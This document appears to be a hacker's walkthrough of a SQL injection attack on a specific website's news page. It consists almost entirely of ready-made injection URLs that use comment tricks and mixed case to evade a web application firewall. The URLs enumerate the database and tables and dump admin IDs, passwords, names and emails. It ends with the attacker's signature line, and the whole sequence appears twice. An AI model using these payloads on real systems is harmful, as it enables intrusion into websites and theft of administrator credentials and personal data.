SQL injection Waf
Tarrget Site:http://www.site.ps
.
Inject Here :http://www.site.ps/news_view.php?id=43
.
Sql injection Error:http://www.site.ps/news_view.php?id=43'
.
Finding Database , user and Version:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000CONCAT*/(database(),user(),version()),3,4,5,6,7,8,9--+
.
Finding Tables:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(table_name)*/,3,4,5,6,7,8,9 /*!50000fRoM*/+/*!
50000iNfOrMaTiOn_ScHeMa*//*!50000.TaBlEs*/+/*!50000wHeRe*/+/*!50000table_schema=database()*/--+-
.
Fiding Colums:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(column_name)*/,3,4,5,6,7,8,9+/*!50000fRoM*/+/*!50000iNfOrMaTiOn_ScHeMa*//*!50000.ColUmnS*/+/*!50000wHeRe*/+/*!50000table_name=0x61646D696E*/--+-
.
Dump admin id,user name,email and password:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(admin_id,pwd,name,email)*/,3,4,5,6,7,8,9+/*!50000fRoM*/+/*!50000admin*/--+-
.
Print out My name:
http://www.site.ps/news_view.php?id=43' /*!50000union*/ /*!50000select*/ 1,/*!50000gRoUp_CoNcAt('~Injected By Aung San Oo ~',admin_id,pwd,name,email)*/,3,4,5,6,7,8,9 /*!50000fRoM*//*!50000admin*/--+
.
Inject Here :http://www.site.ps/news_view.php?id=43
.
Sql injection Error:http://www.site.ps/news_view.php?id=43'
.
Finding Database , user and Version:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000CONCAT*/(database(),user(),version()),3,4,5,6,7,8,9--+
.
Finding Tables:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(table_name)*/,3,4,5,6,7,8,9 /*!50000fRoM*/+/*!
50000iNfOrMaTiOn_ScHeMa*//*!50000.TaBlEs*/+/*!50000wHeRe*/+/*!50000table_schema=database()*/--+-
.
Fiding Colums:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(column_name)*/,3,4,5,6,7,8,9+/*!50000fRoM*/+/*!50000iNfOrMaTiOn_ScHeMa*//*!50000.ColUmnS*/+/*!50000wHeRe*/+/*!50000table_name=0x61646D696E*/--+-
.
Dump admin id,user name,email and password:
http://www.site.ps/news_view.php?id=43%27%20/*!50000union*/+/*!50000select*/%201,/*!50000gRoUp_CoNcAt(admin_id,pwd,name,email)*/,3,4,5,6,7,8,9+/*!50000fRoM*/+/*!50000admin*/--+-
.
Print out My name:
http://www.site.ps/news_view.php?id=43' /*!50000union*/ /*!50000select*/ 1,/*!50000gRoUp_CoNcAt('~Injected By Aung San Oo ~',admin_id,pwd,name,email)*/,3,4,5,6,7,8,9 /*!50000fRoM*//*!50000admin*/--+
